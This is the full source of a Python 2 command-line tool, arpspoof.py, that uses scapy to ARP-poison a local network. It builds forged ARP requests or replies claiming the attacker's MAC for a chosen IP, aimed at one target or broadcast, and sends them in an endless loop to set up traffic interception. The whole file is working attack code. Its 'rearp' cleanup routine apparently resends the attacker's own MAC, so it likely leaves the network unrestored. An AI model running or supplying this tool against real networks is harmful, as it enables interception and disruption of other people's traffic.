arpspoof.py

1. #!/usr/bin/env python
2. import logging
3. logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
4. from scapy.all import *
5. from optparse import OptionParser
6. import os, sys, signal
7. from time import sleep
8.  
9. if os.geteuid() != 0:
10.     print "[-] Run me as root"
11.     sys.exit(1)
12.  
13. usage = 'Usage: %prog [-i interface] [-t target] host'
14. parser = OptionParser(usage)
15. parser.add_option('-i', dest='interface', help='Specify the interface to use')
16. parser.add_option('-t', dest='target', help='Specify a particular host to ARP poison')
17. parser.add_option('-m', dest='mode', default='req', help='Poisoning mode: requests (req) or replies (rep) [default: %default]')
18. parser.add_option('-s', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning')
19. (options, args) = parser.parse_args()
20.  
21. if len(args) != 1 or options.interface == None:
22.     parser.print_help()
23.     sys.exit(0)
24.  
25. mac = get_if_hwaddr(options.interface)
26.  
27. def build_req():
28.     if options.target == None:
29.         pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=mac, psrc=args[0], pdst=args[0])
30.     elif options.target:
31.         target_mac = getmacbyip(options.target)
32.         if target_mac == None:
33.             print "[-] Error: Could not resolve targets MAC address"
34.             sys.exit(1)
35.         pkt = Ether(src=mac, dst=target_mac)/ARP(hwsrc=mac, psrc=args[0], hwdst = target_mac, pdst=options.target)
36.  
37.     return pkt
38.  
39.  
40. def build_rep():
41.     if options.target == None:
42.         pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=mac, psrc=args[0], op=2)
43.     elif options.target:
44.         target_mac = getmacbyip(options.target)
45.         if target_mac == None:
46.             print "[-] Error: Could not resolve targets MAC address"
47.             sys.exit(1)
48.         pkt = Ether(src=mac, dst=target_mac)/ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target, op=2)
49.  
50.     return pkt
51.  
52.  
53. def rearp(signal, frame):
54.     sleep(1)
55.     print '\n[*] Re-arping network'
56.     rearp_mac = getmacbyip(args[0])
57.     pkt = Ether(src=rearp_mac, dst='ff:ff:ff:ff:ff:ff')/ARP(psrc=args[0], hwsrc=mac, op=2)
58.     sendp(pkt, inter=1, count=5, iface=options.interface)
59.     sys.exit(0)
60.  
61. signal.signal(signal.SIGINT, rearp)
62.  
63. if options.mode == 'req':
64.     pkt = build_req()
65. elif options.mode == 'rep':
66.     pkt = build_rep()
67.  
68. if options.summary == True:
69.     pkt.show()
70.     ans = raw_input('\n[*] Continue? [Y|n]: ').lower()
71.     if ans == 'y' or len(ans) == 0:
72.         pass
73.     else:
74.         sys.exit(0)
75.  
76. while True:
77.     sendp(pkt, inter=2, iface=options.interface)